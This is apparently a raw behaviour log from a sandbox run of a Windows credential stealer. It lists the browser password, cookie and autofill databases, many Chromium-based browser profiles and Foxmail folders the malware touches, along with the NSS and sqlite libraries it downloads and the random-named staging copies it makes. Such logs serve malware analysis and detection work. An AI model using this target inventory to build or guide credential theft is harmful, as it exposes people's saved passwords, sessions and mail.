C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Cache\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Code Cache\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\databases\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Extension State\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\GCM Store\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\GPUCache\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Local Storage\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\*
C:\Windows\System32\api-ms-win-core-datetime-l1-1-1.DLL
C:\Windows\System32\api-ms-win-core-localization-obsolete-l1-2-0.DLL
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Louise\AppData\LocalLow\frAQBc8Wsa
C:\Users\Louise\AppData\LocalLow\frAQBc8Wsa-journal
C:\Users\Louise\AppData\LocalLow\frAQBc8Wsa-wal
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Session Storage\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Sync Data\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\FileTypePolicies\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\InterventionPolicyDatabase\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\MEIPreload\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\OriginTrials\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\PepperFlash\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\pnacl\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\RecoveryImproved\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Safe Browsing\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\SafetyTips\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\ShaderCache\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Subresource Filter\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\SwReporter\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList32\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\WidevineCdm\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalLow\1xVPfvJcrg
C:\Users\Louise\AppData\LocalLow\1xVPfvJcrg-journal
C:\Users\Louise\AppData\LocalLow\1xVPfvJcrg-wal
C:\Users\Louise\AppData\LocalLow\RYwTiizs2t
C:\Users\Louise\AppData\LocalLow\RYwTiizs2t-journal
C:\Users\Louise\AppData\LocalLow\RYwTiizs2t-wal
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Cookies
C:\Users\Louise\AppData\LocalLow\rQF69AzBla
C:\Users\Louise\AppData\LocalLow\rQF69AzBla-journal
C:\Users\Louise\AppData\LocalLow\rQF69AzBla-wal
C:\Users\Louise\AppData\Local\Google\Chrome Beta\User Data\*
C:\Users\Louise\AppData\Local\Google\Chrome SxS\User Data\*
C:\Users\Louise\AppData\Local\Chromium\User Data\*
C:\Users\Louise\AppData\Local\Xpom\User Data\*
C:\Users\Louise\AppData\Local\Comodo\Dragon\User Data\*
C:\Users\Louise\AppData\Local\Amigo\User Data\*
C:\Users\Louise\AppData\Local\Orbitum\User Data\*
C:\Users\Louise\AppData\Local\Bromium\User Data\*
C:\Users\Louise\AppData\Local\Nichrome\User Data\*
C:\Users\Louise\AppData\Local\RockMelt\User Data\*
C:\Users\Louise\AppData\Local\360Browser\Browser\User Data\*
C:\Users\Louise\AppData\Local\Vivaldi\User Data\*
C:\Users\Louise\AppData\Roaming\Opera Software
C:\Users\Louise\AppData\Local\Go!\User Data\*
C:\Users\Louise\AppData\Local\Sputnik\Sputnik\User Data\*
C:\Users\Louise\AppData\Local\Kometa\User Data\*
C:\Users\Louise\AppData\Local\uCozMedia\Uran\User Data\*
C:\Users\Louise\AppData\Local\QIP Surf\User Data\*
C:\Users\Louise\AppData\Local\Epic Privacy Browser\User Data\*
C:\Users\Louise\AppData\Local\CocCoc\Browser\User Data\*
C:\Users\Louise\AppData\Local\CentBrowser\User Data\*
C:\Users\Louise\AppData\Local\7Star\7Star\User Data\*
C:\Users\Louise\AppData\Local\Elements Browser\User Data\*
C:\Users\Louise\AppData\Local\TorBro\Profile\*
C:\Users\Louise\AppData\Local\Suhba\User Data\*
C:\Users\Louise\AppData\Local\Safer Technologies\Secure Browser\User Data\*
C:\Users\Louise\AppData\Local\Rafotech\Mustang\User Data\*
C:\Users\Louise\AppData\Local\Superbird\User Data\*
C:\Users\Louise\AppData\Local\Chedot\User Data\*
C:\Users\Louise\AppData\Local\Torch\User Data\*
C:\Users\Louise\AppData\Local\Tencent\QQBrowser\User Data\*
C:\Users\Louise\AppData\Local\UCBrowser\*
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0
C:\Windows\System32\api-ms-win-core-sysinfo-l1-2-1.DLL
C:\Users\Louise\AppData\LocalLow\cr6im03b56g32r
C:\Users\Louise\AppData\LocalLow\machineinfo.txt
C:\Windows\System32\tzres.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
D:\Program Files\Foxmail 7.2\Storage\*
D:\Program Files (x86)\Foxmail 7.2\Storage\*
D:\Foxmail 7.2\Storage\*
C:\Program Files\Foxmail 7.2\Storage\*
C:\Program Files (x86)\Foxmail 7.2\Storage\*
C:\Foxmail 7.2\Storage\*
C:\Users\Louise\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QYHUQKJQ
C:\Users\Louise\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QYHUQKJQ\libs[1].zip
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\hv8745939v498h.zip
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\nssdbm3.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\prldap60.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\qipcap.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\ucrtbase.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\AccessibleHandler.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\AccessibleMarshal.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\IA2Marshal.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\ldap60.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\ldif60.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\lgpllibs.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\libEGL.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32_InUse.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\nssckbi.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-namedpipe-l1-1-0.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processenvironment-l1-1-0.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-0.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-1.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-profile-l1-1-0.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-rtlsupport-l1-1-0.dll
C:\Windows\Temp
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24308_none_5c028e37a0121035\GdiPlus.dll
\Device\RasAcd
\Device\NetBT_Tcpip_{904D2269-4DBE-41E3-885E-48DAF5904320}
\Device\NetBT_Tcpip_{3D9F7467-160C-4168-A2F0-23218AC74924}
\Device\NetBT_Tcpip6_{904D2269-4DBE-41E3-885E-48DAF5904320}
\Device\NetBT_Tcpip6_{3D9F7467-160C-4168-A2F0-23218AC74924}
C:\Windows\SysWOW64\wininet.dll
C:\Windows\System32\wshqos.dll
C:\Users\Louise\AppData\LocalLow\sqlite3.dll
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Louise\AppData\LocalLow\frAQBc8Wsa
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\Louise\AppData\LocalLow\1xVPfvJcrg
C:\Users\Louise\AppData\LocalLow\RYwTiizs2t
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Cookies
C:\Users\Louise\AppData\LocalLow\rQF69AzBla
C:\Windows\System32\tzres.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\hv8745939v498h.zip
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
\Device\RasAcd
C:\Users\Louise\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\27XJCA2W\sqlite3[1].dll
C:\Users\Louise\AppData\LocalLow\frAQBc8Wsa
C:\Users\Louise\AppData\LocalLow\1xVPfvJcrg
C:\Users\Louise\AppData\LocalLow\RYwTiizs2t
C:\Users\Louise\AppData\LocalLow\rQF69AzBla
C:\Users\Louise\AppData\LocalLow\machineinfo.txt
C:\Users\Louise\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QYHUQKJQ\libs[1].zip
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\nssdbm3.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\prldap60.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\qipcap.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\ucrtbase.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\AccessibleHandler.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\AccessibleMarshal.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\IA2Marshal.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\ldap60.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\ldif60.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\lgpllibs.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\libEGL.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32_InUse.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\nssckbi.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-namedpipe-l1-1-0.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processenvironment-l1-1-0.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-0.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-1.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-profile-l1-1-0.dll
C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-rtlsupport-l1-1-0.dll
C:\Users\Louise\AppData\LocalLow\frAQBc8Wsa
C:\Users\Louise\AppData\LocalLow\1xVPfvJcrg
C:\Users\Louise\AppData\LocalLow\RYwTiizs2t
C:\Users\Louise\AppData\LocalLow\rQF69AzBla
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\1e4\52C64B7E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\1E4\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\1E4\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\1E4\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\DisallowedCertSyncDeltaTime
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\ChainEngine\Config
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableMandatoryBasicConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableCANameConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableUnsupportedCriticalExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlCountInCert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCountPerChain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCertCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\CryptnetPreFetchTriggerPeriodSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableWeakSignatureFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MinRsaPubKeyBitLength
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakRsaPubKeyTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\ChainCacheResyncFiletime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakMD5ThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakMD5ThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakMD5ThirdPartyAfterTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakMD5AllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakMD5AllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakMD5ThirdPartySha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakMD5AllSha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakMD5ThirdPartySha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakMD5AllSha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakSHA1ThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakSHA1ThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakSHA1ThirdPartyAfterTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakSHA1AllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakSHA1AllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakSHA1ThirdPartySha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakSHA1AllSha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakSHA1ThirdPartySha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakSHA1AllSha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakRSAThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakRSAThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakRSAAllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakRSAAllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakDSAThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakDSAThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakDSAAllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakDSAAllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakECDSAThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakECDSAThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakECDSAAllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakECDSAAllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CertDllOpenStoreProv
HKEY_USERS\S-1-5-21-1339698970-4093829097-1161395185-1000
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1339698970-4093829097-1161395185-1000
